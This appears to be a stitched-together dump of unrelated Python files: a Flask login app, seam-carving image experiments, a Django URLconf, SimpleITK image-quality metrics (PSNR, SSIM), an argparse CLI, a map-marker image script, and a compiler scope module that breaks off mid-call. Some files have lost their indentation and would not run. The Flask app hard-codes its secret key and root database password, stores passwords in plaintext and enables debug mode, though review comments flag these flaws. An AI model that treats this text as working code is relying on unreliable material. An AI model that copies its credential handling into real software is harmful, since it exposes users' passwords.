    # end) -- k in the `start` slot -- so every recursion searched garbage
    # bounds.  Arguments now match the signature.
    return get_first_k2(arr, length, start, end, k)
# Quick smoke test: 3 occurs four times in the sample array.
a_list = [1, 2, 3, 3, 3, 3, 4, 5]
print(solution(a_list, 3))
|
from flask import Flask, render_template, redirect, request
from flask.ext.login import LoginManager, login_required, login_user, logout_user, UserMixin, current_user
from werkzeug.security import generate_password_hash, check_password_hash
from models.all import db, Person
from lib import *
# Application wiring: create the Flask app, bind SQLAlchemy, configure auth.
app = Flask(__name__)
db.init_app(app)
app.debug = True  # NOTE(review): debug mode must be disabled in production
login_manager = LoginManager()
# NOTE(security): secret key and DB credentials are hard-coded in source --
# move them to configuration / environment variables.
app.secret_key = "bananafaceankle"
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+mysqlconnector://root:banana@localhost:3306/buuf_re'
class User(UserMixin):
    """Flask-Login user object wrapping a Person row."""

    def __init__(self, person, userid, name):
        self.person = person
        self.id = userid
        self.name = name

    @staticmethod
    def get(userid):
        """Look up a Person by username and wrap it; None when absent."""
        record = Person.query.filter_by(username=userid).first()
        if record is None:
            return None
        return User(record, record.username, record.name)
def verify_pass(username, password):
    """Return True iff `username` exists and `password` matches the stored one.

    NOTE(security): passwords are compared (and, per register(), stored) in
    plaintext even though werkzeug's check_password_hash is imported --
    hashing should be adopted end to end.
    """
    user = db.session.query(Person).filter(Person.username == username).first()
    # BUG FIX: an unknown username returned None and the attribute access
    # below raised AttributeError; treat it as a failed login instead.
    if user is None:
        print('password fail')
        return False
    # Parenthesized print works identically on Python 2 and 3.
    if user.password == password:
        print('password match')
        return True
    else:
        print('password fail')
        return False
@app.route('/')
def base():
    """Root route: render home for a logged-in user, else bounce to /login/."""
    try:
        print current_user
        if current_user.get_id() is not None:
            print 'going home'
            return render_template("home.html")
        else:
            print 'please log in'
            return redirect("/login/")
    except Exception as e:
        # NOTE(review): this catch-all path falls through and returns None,
        # which Flask turns into an error response -- confirm intended.
        print 'BAD!!!!!!!'
        print e
# Hook Flask-Login into the app; unauthenticated users go to the login view.
login_manager.init_app(app)
login_manager.login_view = "login"
@app.route('/home/')
@login_required
def home():
    """Authenticated landing page."""
    print 'home'
    return render_template("home.html")
@login_manager.user_loader
def load_user(userid):
    """Flask-Login callback: rebuild the User object for a session's id."""
    print 'load user'
    return User.get(userid)
@app.route("/logout/")
@login_required
def logout():
    """End the current session.

    NOTE(review): redirects to /home/, which is itself @login_required and
    will immediately bounce the now-logged-out user to login -- confirm.
    """
    print 'logout'
    logout_user()
    return redirect("/home/")
@app.route('/login/', methods=['GET', 'POST'])
def login():
    """GET: render the login form.  POST: verify credentials and log in."""
    print 'login'
    print request.method
    if request.method == "POST":
        username = request.form['user']
        user = User.get(username)
        if user and verify_pass(username, request.form['pass']):
            print 'good credentials'
            login_user(user)
            # NOTE(review): renders home.html directly instead of redirecting
            # (no POST/redirect/GET), so refresh re-submits the form -- confirm.
            return render_template("home.html")
        else:
            print 'bad credentials'
            return render_template("login.html", errors=["bad credentials"])
    print 'what'
    return render_template("login.html", error=None)
@app.route('/register/', methods=['GET', 'POST'])
def register():
    """GET: render the registration form.  POST: create a Person row."""
    print 'register'
    print request.method
    if request.method == "POST":
        if request.form['pass1'] == request.form['pass2']:
            print 'passwords match'
            # NOTE(security): the password is stored in plaintext even though
            # generate_password_hash is imported -- hash before storing.
            person = Person(
                name=request.form['name'],
                email=request.form['email'],
                username=request.form['username'],
                password=request.form['pass1']
            )
            dbadd(person)
            return render_template("login.html", messages=['Registration successful.'])
        else:
            print 'passwords different'
            return render_template("register.html", error=['Passwords don\'t match'])
    print "what"
    return render_template("register.html")
# Run the development server when executed directly.
if __name__ == '__main__':
    app.run()
|
from skimage import io
from matplotlib import pyplot as plt
import random
import sc
import network_energy
import forward_conv_energy
import forward_energy
import part1_energy
import combined_energy
# Input image for the seam-carving experiments below.
image_dir = "smallcar.jpg"
# Candidate image dimensions (columns * rows) used in past runs:
# sb: 500*375 c*r
# cat: 360*263
# cute cat: 333*220 c*r
# timg: 325*186
#
cuts = 20  # NOTE(review): unused in this file -- confirm whether still needed
# seam carve and show result
img = io.imread(image_dir)
def draw_seam(seam):
    """Overlay a seam on the current matplotlib axes as a dashed line.

    `seam` is a sequence of (row, col) points; columns become the x
    coordinates and rows the y coordinates.
    """
    cols = [point[1] for point in seam]
    rows = [point[0] for point in seam]
    plt.plot(cols, rows, '--')
def determine_directions(dr, dc):
    """Return a randomly ordered list of dc 'vertical' and dr 'horizontal'
    seam directions (one entry per seam to process)."""
    order = ['vertical'] * dc
    order.extend(['horizontal'] * dr)
    random.shuffle(order)
    return order
def compare_resize(ori, func, forward, cut_r, cut_c, name, func2, forward2, name2, filename):
    """Resize `ori` with two energy functions and save a side-by-side figure.

    Assumed from usage (confirm against the sc module): func/func2 are
    energy-map functions, forward/forward2 select the forward-energy
    variant, cut_r/cut_c are signed row/column deltas (negative shrinks,
    positive grows), name/name2 title the subplots, filename is the output
    figure path.
    """
    r, c = ori.shape[0], ori.shape[1]
    out_r = r + cut_r
    out_c = c + cut_c
    # Disabled seam-by-seam variant kept for reference:
    """
    img = ori
    dirs = sc.determine_directions(img, func, forward, out_r, out_c)
    carved_seams = []
    cnt = 0
    len_d = len(dirs)
    for d in dirs:
        #em = func(img)
        print("process {}/{}".format(cnt, len_d))
        cnt += 1
        img, tmp_seams = sc.carve(img, func, forward, d, num=1, border=1, need_seam=True)
        carved_seams += tmp_seams
    seams = sc.transform_seams(carved_seams)
    """
    #img = sc.resize_once(ori, func, forward, out_r, out_c)
    img = sc.resize_multi(ori, func, forward, out_r, out_c)
    img2 = sc.resize_multi(ori, func2, forward2, out_r, out_c)
    plt.figure()
    plt.subplot(121)
    plt.title(name)
    plt.imshow(img)
    #for seam in seams:
    #    draw_seam(seam.coor)
    plt.subplot(122)
    plt.title(name2)
    plt.imshow(img2)
    plt.savefig(filename)
    #for seam in carved2:
    #    draw_seam(seam.coor)
def compare_resize_3(ori, func1, forward1, cut_r, cut_c, name1, func2, forward2, name2, func3, forward3, name3, filename):
    """Resize `ori` with three energy functions and save a 1x3 comparison
    figure to `filename` (see compare_resize for parameter conventions)."""
    r, c = ori.shape[0], ori.shape[1]
    # Signed size deltas: callers pass negatives to carve, positives to grow.
    out_r = r + cut_r
    out_c = c + cut_c
    img1 = sc.resize_multi(ori, func1, forward1, out_r, out_c)
    img2 = sc.resize_multi(ori, func2, forward2, out_r, out_c)
    img3 = sc.resize_multi(ori, func3, forward3, out_r, out_c)
    plt.figure()
    plt.subplot(131)
    plt.title(name1)
    plt.imshow(img1)
    #for seam in seams:
    #    draw_seam(seam.coor)
    plt.subplot(132)
    plt.title(name2)
    plt.imshow(img2)
    plt.subplot(133)
    plt.title(name3)
    plt.imshow(img3)
    plt.savefig(filename)
    #for seam in carved2:
    #    draw_seam(seam.coor)
def try_resize(ori, func, forward, cut_r, cut_c, name, filename):
    """Resize `ori` with one energy function and save an original-vs-result
    figure to `filename` (see compare_resize for parameter conventions)."""
    r, c = ori.shape[0], ori.shape[1]
    out_r = r + cut_r
    out_c = c + cut_c
    img = sc.resize_multi(ori, func, forward, out_r, out_c)
    plt.figure()
    plt.subplot(121)
    plt.title("original")
    plt.imshow(ori)
    #for seam in seams:
    #    draw_seam(seam.coor)
    plt.subplot(122)
    plt.title(name+" result")
    plt.imshow(img)
    plt.savefig(filename)
    #for seam in carved2:
    #    draw_seam(seam.coor)
#try_resize(img, forward_conv_energy.energy_map, True, -15, -55, "cut:forward")
#try_resize(img, part1_energy.combine, False, +10, +20, "enlarge:RGB+entropy")
#try_resize(img, network_energy.energy_map, False, 0, 150, "network", '3 150 network')
#compare_resize(img, network_energy.energy_map, False, 0, 100, "network",
# network_energy.tail_map, False, "tail", "3 100 network vs tail")
#compare_resize(img, part1_energy.combine, False, 0, 150, "RGB+entropy",
# forward_conv_energy.energy_map, True, " forward", "3 150 RGB_entopy vs forward")
#compare_resize_3(img, part1_energy.combine, False, -50, 60, "RGB+entropy",
# network_energy.tail_map, False, "tail",
# combined_energy.part1_tail, False, "combined", "cutecat -+ RGB tail combined")
def test():
    """Compute four energy maps for dolphin.jpg and save a 2x2 comparison
    figure ("energy_map_compare")."""
    img = io.imread('dolphin.jpg')
    RGB = part1_energy.RGBdifference(img)
    H = part1_energy.minus_entropy(img)
    RGBH = part1_energy.combine(img)
    N = network_energy.energy_map(img)
    plt.figure()
    plt.subplot(221)
    plt.title("RGB energy map")
    plt.imshow(RGB)
    plt.subplot(222)
    plt.title("entropy energy map")
    plt.imshow(H)
    plt.subplot(223)
    plt.title("RGBH energy map")
    plt.imshow(RGBH)
    plt.subplot(224)
    plt.title("NETWORK energy map")
    plt.imshow(N)
    plt.savefig("energy_map_compare")
    plt.show()
    #H = combine(img, show=True)
    #plt.imshow(H)
    #plt.show()
#test()
# Show and save the unmodified input image for reference.
plt.figure()
plt.title('Original Image')
plt.imshow(img)
plt.savefig('smallcar_origin')
plt.show()
|
# -*- coding: utf-8 -*-
from django.conf.urls import url
from django.urls import include
# Route everything under kg_django/ to the app's own URLconf.
# NOTE(review): django.conf.urls.url was removed in Django 4.0; re_path/path
# is the modern equivalent -- confirm the target Django version.
urlpatterns = [
    url(r'^kg_django/', include('kg_django.urls', namespace='kg_django'))
]
# library path
import os, sys
# lib_path = os.path.abspath(
# '/vol/biomedic/users/aa16914/software/SimpleITK/SimpleITK-build/SimpleITK-build/Wrapping/Python/')
# sys.path.insert(1, lib_path)
import SimpleITK as sitk
import numpy as np
import math as mt
# ssim
from scipy.ndimage import uniform_filter, gaussian_filter
from numpy.lib.arraypad import _validate_lengths
# multi-processing
import multiprocessing
# Shared thread count used by all SimpleITK filters in this module.
num_cores = multiprocessing.cpu_count()
###############################################################
# dtype_range = {np.bool_: (False, True),
# np.bool8: (False, True),
# np.uint8: (0, 255),
# np.uint16: (0, 65535),
# np.uint32: (0, 2**32 - 1),
# np.uint64: (0, 2**64 - 1),
# np.int8: (-128, 127),
# np.int16: (-32768, 32767),
# np.int32: (-2**31, 2**31 - 1),
# np.int64: (-2**63, 2**63 - 1),
# np.float16: (-1, 1),
# np.float32: (-1, 1),
# np.float64: (-1, 1)}
#
###############################################################
def _as_floats(im1, im2):
"""Promote im1, im2 to nearest appropriate floating point precision."""
float_type = np.result_type(im1.dtype, im2.dtype, np.float32)
if im1.dtype != float_type:
im1 = im1.astype(float_type)
if im2.dtype != float_type:
im2 = im2.astype(float_type)
return im1, im2
###############################################################
def crop(ar, crop_width, copy=False, order='K'):
    """Crop array `ar` by `crop_width` along each dimension.

    Parameters
    ----------
    ar : array-like of rank N
        Input array.
    crop_width : {sequence, int}
        Number of values to remove from the edges of each axis.
        ``((before_1, after_1),`` ... ``(before_N, after_N))`` specifies
        unique crop widths at the start and end of each axis.
        ``((before, after),)`` specifies a fixed start and end crop
        for every axis.
        ``(n,)`` or ``n`` for integer ``n`` is a shortcut for
        before = after = ``n`` for all axes.
    copy : bool, optional
        If `True`, ensure the returned array is a contiguous copy. Normally,
        a crop operation will return a discontiguous view of the underlying
        input array.
    order : {'C', 'F', 'A', 'K'}, optional
        If ``copy==True``, control the memory layout of the copy. See
        ``np.copy``.

    Returns
    -------
    cropped : array
        The cropped array. If ``copy=False`` (default), this is a sliced
        view of the input array.

    Raises
    ------
    ValueError
        If ``crop_width`` cannot be broadcast to the array's rank.
    """
    # BUG FIX: this function depended on numpy's private helper
    # numpy.lib.arraypad._validate_lengths, removed in numpy >= 1.16;
    # the (before, after) normalization is now done locally, following
    # np.pad's pad_width conventions.
    ar = np.asarray(ar)
    spec = np.asarray(crop_width, dtype=int)
    if spec.ndim == 0:
        crops = [(int(spec), int(spec))] * ar.ndim
    elif spec.ndim == 1:
        if spec.size == 1:
            crops = [(int(spec[0]), int(spec[0]))] * ar.ndim
        elif spec.size == 2:
            # (before, after) broadcast to every axis (matches np.pad).
            crops = [(int(spec[0]), int(spec[1]))] * ar.ndim
        elif spec.size == ar.ndim:
            crops = [(int(s), int(s)) for s in spec]
        else:
            raise ValueError("crop_width does not match array rank")
    elif spec.ndim == 2 and spec.shape[1] == 2:
        if spec.shape[0] == 1:
            crops = [(int(spec[0, 0]), int(spec[0, 1]))] * ar.ndim
        elif spec.shape[0] == ar.ndim:
            crops = [(int(b), int(a)) for b, a in spec]
        else:
            raise ValueError("crop_width does not match array rank")
    else:
        raise ValueError("invalid crop_width specification")
    # BUG FIX: index with a *tuple* of slices; indexing with a list of
    # slices is deprecated and an error in modern numpy.
    slices = tuple(slice(a, ar.shape[i] - b) for i, (a, b) in enumerate(crops))
    if copy:
        return np.array(ar[slices], order=order, copy=True)
    return ar[slices]
###############################################################
def register(moving_image, fixed_image):
    """Deformably register moving_image to fixed_image with a B-spline model.

    Parameters
    ----------
    moving_image : sitk image
        Image to be warped.
    fixed_image : sitk image
        Reference image defining the target space.

    Returns
    -------
    sitk image
        moving_image resampled through the optimised B-spline transform.
    """
    # 10-control-point B-spline mesh per dimension over the fixed image.
    transfromDomainMeshSize = [10] * moving_image.GetDimension()
    tx = sitk.BSplineTransformInitializer(fixed_image,
                                          transfromDomainMeshSize)
    R = sitk.ImageRegistrationMethod()
    R.SetMetricAsMattesMutualInformation(50)  # 50 histogram bins
    R.SetOptimizerAsGradientDescentLineSearch(5.0, 100,
                                              convergenceMinimumValue=1e-4,
                                              convergenceWindowSize=5)
    R.SetOptimizerScalesFromPhysicalShift()
    R.SetInitialTransform(tx)
    R.SetInterpolator(sitk.sitkLinear)
    # Three-level coarse-to-fine pyramid.
    R.SetShrinkFactorsPerLevel([6, 2, 1])
    R.SetSmoothingSigmasPerLevel([6, 2, 1])
    R.SetNumberOfThreads(num_cores)
    outTx = R.Execute(fixed_image, moving_image)
    resampler = sitk.ResampleImageFilter()
    resampler.SetReferenceImage(fixed_image);
    resampler.SetInterpolator(sitk.sitkLinear)
    # NOTE(review): out-of-domain voxels are filled with 100 here but with 0
    # in register_rigid -- confirm which default is intended.
    resampler.SetDefaultPixelValue(100)
    resampler.SetTransform(outTx)
    resampler.SetNumberOfThreads(num_cores)
    return resampler.Execute(moving_image)
###############################################################
def register_rigid(moving_image, fixed_image):
    """Register moving_image to fixed_image with a translation-only transform.

    Parameters
    ----------
    moving_image : sitk image
        Image to be aligned.
    fixed_image : sitk image
        Reference image defining the target space.

    Returns
    -------
    sitk image
        moving_image resampled into fixed_image's grid through the
        optimised translation.
    """
    numberOfBins = 24
    samplingPercentage = 0.10
    R = sitk.ImageRegistrationMethod()
    R.SetMetricAsMattesMutualInformation(numberOfBins)
    R.SetMetricSamplingPercentage(samplingPercentage)
    R.SetMetricSamplingStrategy(R.RANDOM)
    # BUG FIX: removed a pasted-in displacement-field registration section
    # that referenced undefined names (`fixed`, `moving`, and `outTx` before
    # its assignment) and therefore raised NameError on every call.
    R.SetOptimizerAsRegularStepGradientDescent(1.0, .001, 200)
    R.SetInitialTransform(sitk.TranslationTransform(fixed_image.GetDimension()))
    R.SetInterpolator(sitk.sitkLinear)
    R.SetNumberOfThreads(num_cores)
    outTx = R.Execute(fixed_image, moving_image)
    resampler = sitk.ResampleImageFilter()
    resampler.SetReferenceImage(fixed_image)
    resampler.SetInterpolator(sitk.sitkLinear)
    resampler.SetDefaultPixelValue(0)
    resampler.SetTransform(outTx)
    resampler.SetNumberOfThreads(num_cores)
    return resampler.Execute(moving_image)
###############################################################
def resample(tar_img, ref_img):
    """Resample `tar_img` onto the grid of `ref_img`.

    Parameters
    ----------
    tar_img : sitk image
        Test image to be resampled.
    ref_img : sitk image
        Ground-truth image whose grid defines the output space.

    Returns
    -------
    sitk image
        `tar_img` resampled into `ref_img`'s space.
    """
    resampler = sitk.ResampleImageFilter()
    resampler.SetNumberOfThreads(num_cores)
    resampler.SetReferenceImage(ref_img)
    return resampler.Execute(tar_img)
###############################################################
def calc_correlation(tar_img, ref_img):
    """Normalized cross-correlation of two images.

    Parameters
    ----------
    tar_img : array-like
        Test image.
    ref_img : array-like
        Ground-truth image.

    Returns
    -------
    float
        Pearson-style cross-correlation in [-1, 1].
    """
    tar_centered = tar_img - tar_img.mean()
    ref_centered = ref_img - ref_img.mean()
    numerator = np.sum(tar_centered * ref_centered)
    denominator = np.sqrt(np.sum(np.square(tar_centered)) * np.sum(np.square(ref_centered)))
    return numerator / denominator
###############################################################
def calc_mse(tar_img, ref_img):
    """Mean-squared error between two images.

    Parameters
    ----------
    tar_img : array-like
        Test image.
    ref_img : array-like
        Ground-truth image.

    Returns
    -------
    float
        The MSE, accumulated in float64.
    """
    diff = ref_img - tar_img
    return np.mean(diff * diff, dtype=np.float64)
###############################################################
def calc_nrmse(tar_img, ref_img, norm_type='Euclidean'):
    """Normalized root mean-squared error (NRMSE) between two images.

    Parameters
    ----------
    tar_img : array-like
        Test image.
    ref_img : array-like
        Ground-truth image.
    norm_type : {'Euclidean', 'min-max', 'mean'}
        Denominator normalization (case-insensitive): 'Euclidean' uses the
        RMS value of the reference, 'min-max' its intensity range, 'mean'
        its mean (there is no single standard; see the Wikipedia RMSD page).

    Returns
    -------
    float
        The NRMSE metric.

    Raises
    ------
    ValueError
        For an unrecognised norm_type.
    """
    kind = norm_type.lower()
    if kind == 'euclidean':
        denom = np.sqrt(np.mean((ref_img * ref_img), dtype=np.float64))
    elif kind == 'min-max':
        denom = ref_img.max() - ref_img.min()
    elif kind == 'mean':
        denom = ref_img.mean()
    else:
        raise ValueError("Unsupported norm_type")
    # RMSE numerator, inlined from the module's calc_mse (square of a
    # difference is symmetric, so the operand order is immaterial here).
    rmse = np.sqrt(np.mean(np.square(ref_img - tar_img), dtype=np.float64))
    return rmse / denom
###############################################################
def calc_psnr(tar_img, ref_img):
    """Peak signal-to-noise ratio (PSNR) between two images, in dB.

    Assumes an 8-bit dynamic range (peak value 256), matching this module's
    other metrics.

    Parameters
    ----------
    tar_img : array-like
        Test image.
    ref_img : array-like
        Ground-truth image.

    Returns
    -------
    float
        The PSNR metric.
    """
    # MSE accumulated in float64 (inlined from the module's calc_mse; the
    # original's float promotion of the inputs was dead code since the
    # error was computed from the raw arguments).
    mean_sq_err = np.mean(np.square(tar_img - ref_img), dtype=np.float64)
    return 10 * np.log10((256 ** 2) / mean_sq_err)
###############################################################
def calc_ssim(tar_img, ref_img, win_size=None, gradient=False, gaussian_weights=False, full=False, **kwargs):
    """Compute the mean structural similarity index between two images.
    Parameters
    ----------
    tar_img : sitk
        Test image.
    ref_img : sitk
        Ground-truth image.
    win_size : int or None
        The side-length of the sliding window used in comparison. Must be an
        odd value. If `gaussian_weights` is True, this is ignored and the
        window size will depend on `sigma`.
    gradient : bool, optional
        If True, also return the gradient.
    gaussian_weights : bool, optional
        If True, each patch has its mean and variance spatially weighted by a
        normalized Gaussian kernel of width sigma=1.5.
    full : bool, optional
        If True, return the full structural similarity image instead of the
        mean value.
    Other Parameters
    ----------------
    use_sample_covariance : bool
        if True, normalize covariances by N-1 rather than, N where N is the
        number of pixels within the sliding window.
    K1 : float
        algorithm parameter, K1 (small constant, see [1]_)
    K2 : float
        algorithm parameter, K2 (small constant, see [1]_)
    sigma : float
        sigma for the Gaussian when `gaussian_weights` is True.
    Returns
    -------
    mssim : float
        The mean structural similarity over the image.
    grad : ndarray
        The gradient of the structural similarity index between X and Y [2]_.
        This is only returned if `gradient` is set to True.
    S : ndarray
        The full SSIM image. This is only returned if `full` is set to True.
    Notes
    -----
    To match the implementation of Wang et. al. [1]_, set `gaussian_weights`
    to True, `sigma` to 1.5, and `use_sample_covariance` to False.
    References
    ----------
    .. [1] Wang, Z., Bovik, A. C., Sheikh, H. R., & Simoncelli, E. P.
        (2004). Image quality assessment: From error visibility to
        structural similarity. IEEE Transactions on Image Processing,
        13, 600-612.
        https://ece.uwaterloo.ca/~z70wang/publications/ssim.pdf,
        DOI:10.1.1.11.2477
    .. [2] Avanaki, A. N. (2009). Exact global histogram specification
        optimized for structural similarity. Optical Review, 16, 613-621.
        http://arxiv.org/abs/0901.0065,
        DOI:10.1007/s10043-009-0119-z
    """
    tar_vol = tar_img
    ref_vol = ref_img
    # NOTE(review): fixed 8-bit dynamic range assumed -- confirm for
    # float-valued input volumes.
    data_range = 256.0
    K1 = kwargs.pop('K1', 0.01)
    K2 = kwargs.pop('K2', 0.03)
    sigma = kwargs.pop('sigma', 1.5)
    if K1 < 0:
        raise ValueError("K1 must be positive")
    if K2 < 0:
        raise ValueError("K2 must be positive")
    if sigma < 0:
        raise ValueError("sigma must be positive")
    use_sample_covariance = kwargs.pop('use_sample_covariance', True)
    if win_size is None:
        if gaussian_weights:
            win_size = 11  # 11 to match Wang et. al. 2004
        else:
            win_size = 7  # backwards compatibility
    if np.any((np.asarray(tar_vol.shape) - win_size) < 0):
        raise ValueError(
            "win_size exceeds image extent. If the input is a multichannel "
            "(color) image, set multichannel=True.")
    if not (win_size % 2 == 1):
        raise ValueError('Window size must be odd.')
    ndim = tar_vol.ndim
    if gaussian_weights:
        # sigma = 1.5 to approximately match filter in Wang et. al. 2004
        # this ends up giving a 13-tap rather than 11-tap Gaussian
        filter_func = gaussian_filter
        filter_args = {'sigma': sigma}
    else:
        filter_func = uniform_filter
        filter_args = {'size': win_size}
    # ndimage filters need floating point data
    tar_vol = tar_vol.astype(np.float64)
    ref_vol = ref_vol.astype(np.float64)
    NP = win_size ** ndim
    # filter has already normalized by NP
    if use_sample_covariance:
        cov_norm = NP / (NP - 1)  # sample covariance
    else:
        cov_norm = 1.0  # population covariance to match Wang et. al. 2004
    # compute (weighted) means
    ux = filter_func(tar_vol, **filter_args)
    uy = filter_func(ref_vol, **filter_args)
    # compute (weighted) variances and covariances
    uxx = filter_func(tar_vol * tar_vol, **filter_args)
    uyy = filter_func(ref_vol * ref_vol, **filter_args)
    uxy = filter_func(tar_vol * ref_vol, **filter_args)
    vx = cov_norm * (uxx - ux * ux)
    vy = cov_norm * (uyy - uy * uy)
    vxy = cov_norm * (uxy - ux * uy)
    R = data_range
    C1 = (K1 * R) ** 2
    C2 = (K2 * R) ** 2
    # SSIM numerator/denominator terms (Wang et al. 2004, Eq. 13).
    A1, A2, B1, B2 = ((2 * ux * uy + C1,
                       2 * vxy + C2,
                       ux ** 2 + uy ** 2 + C1,
                       vx + vy + C2))
    D = B1 * B2
    S = (A1 * A2) / D
    # to avoid edge effects will ignore filter radius strip around edges
    pad = (win_size - 1) // 2
    # compute (weighted) mean of ssim
    mssim = crop(S, pad).mean()
    if gradient:
        # The following is Eqs. 7-8 of Avanaki 2009.
        grad = filter_func(A1 / D, **filter_args) * tar_vol
        grad += filter_func(-S / B2, **filter_args) * ref_vol
        grad += filter_func((ux * (A2 - A1) - uy * (B2 - B1) * S) / D,
                            **filter_args)
        grad *= (2 / tar_vol.size)
        if full:
            return mssim, grad, S
        else:
            return mssim, grad
    else:
        if full:
            return mssim, S
        else:
            return mssim
###############################################################
###############################################################
if __name__ == "__main__":
    # Ground-truth reconstruction and the reconstruction under evaluation.
    ref_img = sitk.ReadImage('recon_gt.nii.gz')
    # tar_img = sitk.ReadImage('recon_cnn.nii.gz')
    # tar_img = sitk.ReadImage('recon_bspline.nii.gz')
    # tar_img = sitk.ReadImage('recon_linear.nii.gz')
    tar_img = sitk.ReadImage('recon_downsampled.nii.gz')
    # Crop a 10-voxel border from every side of both volumes.
    ref_img = sitk.RegionOfInterest(ref_img, size=[ref_img.GetSize()[0] - 20, ref_img.GetSize()[1] - 20,
                                                   ref_img.GetSize()[2] - 20], index=[10, 10, 10])
    tar_img = sitk.RegionOfInterest(tar_img, size=[tar_img.GetSize()[0] - 20, tar_img.GetSize()[1] - 20,
                                                   tar_img.GetSize()[2] - 20], index=[10, 10, 10])
    # resample to reference image
    tar_img = resample(tar_img=tar_img, ref_img=ref_img)
    # register
    # tar_img = register(moving_image=tar_img, fixed_image=ref_img)
    # calculate psnr
    # NOTE(review): the calc_* helpers use numpy array operations on what
    # are SimpleITK images here -- confirm a conversion happens upstream or
    # that sitk's numpy operator interop is in effect.
    print(calc_psnr(tar_img=tar_img, ref_img=ref_img))
    # calculate cross-correlation
    print(calc_correlation(tar_img=tar_img, ref_img=ref_img))
    # calculate ssim; DSSIM = (1 - SSIM) / 2 is saved as a volume.
    ssim, ssim_vol = calc_ssim(tar_img=tar_img, ref_img=ref_img, full=True)
    dssim_vol = (1 - ssim_vol) / 2.
    print(ssim)
    dssim_img = sitk.GetImageFromArray(dssim_vol)
    dssim_img.CopyInformation(tar_img)
    sitk.WriteImage(dssim_img, 'dssim.nii.gz')
|
#import cv2
import argparse
class CommandLineInterface:
    """Interpret command-line arguments and select what the program does.

    The configured ``argparse.ArgumentParser`` is exposed as ``self.parser``
    so callers and tests can drive parsing directly.
    """

    def __init__(self):
        # set up argument parser
        self.parser = argparse.ArgumentParser()
        self.parser.add_argument(
            "--grayscale",
            help="flag for converting the file specified to grayscale",
            action="store_true",
        )
        # BUG FIX: `type=file` used the Python 2 builtin `file`, which does
        # not exist in Python 3 and raised NameError here. argparse.FileType
        # is the supported way to accept a path and open it for reading.
        self.parser.add_argument(
            "filename",
            help="the path to a file",
            type=argparse.FileType("r"),
        )

    def parseCommand(self):
        """Parse sys.argv and dispatch on the selected options."""
        args = self.parser.parse_args()
        if args.grayscale:
            # Grayscale conversion not implemented yet.
            pass
# Instantiate the CLI and parse sys.argv immediately on import; argparse
# exits with a usage error if the required filename argument is missing.
cli = CommandLineInterface()
cli.parseCommand()
#parser = argparse.ArgumentParser()
#parser.add_argument("-s","--square", help="display a square of a given number", type=int)
#args = parser.parse_args()
#print args.square**2
|
# coding: utf8
import sys, os
import math
from PIL import Image
"""
与えられた画像をgmapのmarker用に整形する
読み込み画像は正方形であると仮定
"""
if not len(sys.argv) == 3:
print("invalid argument!")
sys.exit()
# 読み込み
logo_img = Image.open(sys.argv[1], 'r')
if logo_img.mode != "RGBA":
logo_img = logo_img.convert("RGBA") # RGBモードに変換する
shop_id = sys.argv[2]
#basename = sys.argv[1].split("/")[-1].split(".")[0]
width = logo_img.size[0]
height = logo_img.size[1]
# 32x32にリサイズ
if width != 32:
logo_img.thumbnail((32, 32), Image.ANTIALIAS)
# 画素値をロードしてロゴの代表色をピック
data = logo_img.load()
logo_color = data[3,3]
# ピン用の下三角画像を読み込み
root_dir = os.environ["PROJECT_HOME"]
pin_img_path = root_dir + "/lib/assets/pin.png"
pin_img = Image.open(pin_img_path)
data = pin_img.load()
for x in range(0, pin_img.size[0]):
for y in range(0, pin_img.size[1]):
if data[x, y] != (0,0,0,0):
pixel = list(data[x,y])
pixel[:3] = logo_color[:3]
data[x, y] = tuple(pixel)
# ロゴとピン画像をバーティカルジョインする
marker_pin_img = Image.new("RGBA", (32, 44), (0, 0, 0, 0))
marker_pin_img.paste(logo_img, (0, 0))
marker_pin_img.paste(pin_img, (8, 32))
# 保存
marker_pin_img.save("{}/app/assets/images/{}.png".format(root_dir, shop_id), 'PNG', quality=100, optimize=True)
|
from __future__ import print_function
import intermediate as ir
from util import MultiplePosInfo
Ref = ir.Ref
class ThreeError(Exception):
    """Compile-time error raised during translation; carries position info."""
    pass

class DataType(str):
    """Marker subclass of str naming an expression's static type."""
    pass

# The two built-in data types of the language.
dt_num = DataType("int")
dt_bool = DataType("bool")
class RAMValue:
    """A variable stored in a RAM cell at a fixed address.

    load/store emit real memory instructions through the code collector
    *cc*, unlike RegValue which is register-resident and emits nothing.
    """
    __slots__ = ["addr"]

    def __init__(self, addr):
        # addr must be an intermediate-representation reference.
        assert isinstance(addr, Ref)
        self.addr = addr

    def load(self, cc):
        # Emit a load from this cell; returns the resulting IL value.
        return cc.add_instr(ir.load, self.addr)

    def store(self, cc, value):
        # Emit a store of *value* into this cell.
        return cc.add_instr(ir.store, self.addr, value)
class RegValue:
    """A variable held directly as a (virtual) register value.

    load/store emit no instructions; they just read or replace the value.
    """
    __slots__ = ["value"]

    def __init__(self, value):
        self.value = value

    def store(self, cc, value):
        """Replace the held value and return it."""
        self.value = value
        return self.value

    def load(self, cc):
        """Return the currently held value."""
        return self.value
class Scope:
    """Symbol tables for structs, fields and variables, with duplicate
    declaration tracking.

    The ``*_prev_decl`` dicts map a name to the position of its first
    declaration so a redeclaration can report both sites.
    """

    def __init__(self):
        self.structs = {}
        self.fields = {}      # field name -> (struct name, field index)
        self.variables = {}   # variable name -> RAMValue / RegValue
        self.structs_prev_decl = {}
        self.fields_prev_decl = {}
        self.variables_prev_decl = {}

    def check_redecl(self, prev_decl, name, posinfo, msg_extend=lambda: "", extra_frames=None):
        """Record *name*'s declaration position, raising ThreeError if it
        was already declared in *prev_decl*.

        ``msg_extend`` is accepted for backward compatibility but is
        currently unused. ``extra_frames`` is a list of extra
        (label, posinfo) pairs attached to the error.
        """
        # BUG FIX: extra_frames previously defaulted to a shared mutable
        # list ([]); use None and a fresh list per call instead.
        if extra_frames is None:
            extra_frames = []
        if name in prev_decl:
            prevdecl_info = MultiplePosInfo([
                ("Previous declaration", prev_decl[name]),
                ("Redeclaration", posinfo)
            ] + extra_frames)
            raise ThreeError(prevdecl_info)
        prev_decl[name] = posinfo

    def add_struct(self, struct):
        """Register a struct declaration and all of its field names."""
        self.check_redecl(self.structs_prev_decl, struct.name, struct.posinfo)
        self.structs[struct.name] = struct
        for i, (fname, posinfo) in enumerate(struct.fieldnames):
            self.check_redecl(self.fields_prev_decl, fname, posinfo,
                              lambda: "in " + self.fields[fname][0])
            self.fields[fname] = (struct.name, i)

    def add_var(self, varname, value, posinfo=None, posinfo_ext=None):
        """Bind *varname* to a value object (RAMValue/RegValue)."""
        # BUG FIX: posinfo_ext also used a mutable default ([]).
        self.check_redecl(self.variables_prev_decl, varname, posinfo,
